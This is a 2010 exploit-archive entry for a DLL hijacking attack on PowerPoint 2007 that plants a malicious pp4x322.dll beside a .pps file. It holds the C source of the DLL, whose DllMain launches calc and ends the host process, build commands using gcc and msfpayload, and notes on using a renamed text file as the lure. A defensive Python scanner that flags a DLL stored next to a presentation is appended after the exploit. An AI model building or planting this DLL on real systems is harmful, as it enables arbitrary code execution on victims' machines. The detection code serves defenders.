Microsoft Windows PowerPoint 2007 DLL hijacking exploit that leverages pp4x322.dll.
e782fdc151d83e62b1c18927126480c1ce0b4a1f03dec7981873861231d11046
/*
Exploit Title: Microsoft Windows PowerPoint 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com)
Software Link: http://office.microsoft.com/en-us/
Modified storm's exploit for pp4x322.dll and used the Rapid7 write-up to find it. Happy hunting.
Rapid7 write-up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002
http://monstream00.wordpress.com/
gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
or
msfpayload windows/exec CMD=calc.exe D > pp4x322.dll
.pps file affected.
PowerPoint looks for pp4x322.dll in the same directory as the .pps file and loads the DLL. This will not work with a real .pps but will work with a text file whose extension is changed from .txt to .pps. I have tested it on Windows 7 64bit and it works. Rapid7 has a great article on DLL hijacking and it is a must-read.
*/
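#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Proof-of-concept payload: start calc, then terminate the host process. */
int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;   /* not reached */
}

/* Runs when the DLL is loaded into the process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}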
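
A defender's check for the condition described above, as an added example that is not part of the original exploit file: it walks a directory tree and reports every .pps that shares a directory with a DLL, rating the pair "high" when the .pps lacks the OLE2 header of a genuine binary presentation (the renamed text file case) or the DLL is named pp4x322.dll. The function names, severity labels and sample tree are constructed for this example.

```python
import os
import tempfile

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # first 8 bytes of a genuine binary .pps
PAGE_DLL = "pp4x322.dll"  # DLL name taken from the page

def is_real_pps(path):
    """True if the file starts with the OLE2 compound-file signature."""
    with open(path, "rb") as fh:
        return fh.read(8) == OLE2_MAGIC

def scan(root):
    """Find every .pps that shares a directory with a DLL.

    Returns sorted (relative_dir, dll, pps, severity) tuples. Severity is "high"
    when the .pps is not a real presentation or the DLL has the page's name,
    otherwise "review".
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        dlls = [f for f in files if f.lower().endswith(".dll")]
        decks = [f for f in files if f.lower().endswith(".pps")]
        for dll in dlls:
            for deck in decks:
                fake = not is_real_pps(os.path.join(dirpath, deck))
                high = fake or dll.lower() == PAGE_DLL
                rel = os.path.relpath(dirpath, root)
                findings.append((rel, dll, deck, "high" if high else "review"))
    return sorted(findings)

def demo():
    """Run scan() over a constructed sample tree (not data from the page)."""
    sample = {
        ("quarterly", "results.pps"): OLE2_MAGIC + b"\x00" * 504,
        ("quarterly", "helper.dll"): b"MZ",
        ("inbox", "invite.pps"): b"plain text renamed to .pps",
        ("inbox", "PP4X322.DLL"): b"MZ",
        ("clean", "deck.pps"): OLE2_MAGIC + b"\x00" * 504,
    }
    with tempfile.TemporaryDirectory() as root:
        for (folder, name), data in sample.items():
            os.makedirs(os.path.join(root, folder), exist_ok=True)
            with open(os.path.join(root, folder, name), "wb") as fh:
                fh.write(data)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Point `scan()` at a file share, mail attachment store or download folder; a "review" hit still deserves a look, since a DLL has no ordinary reason to sit beside a presentation.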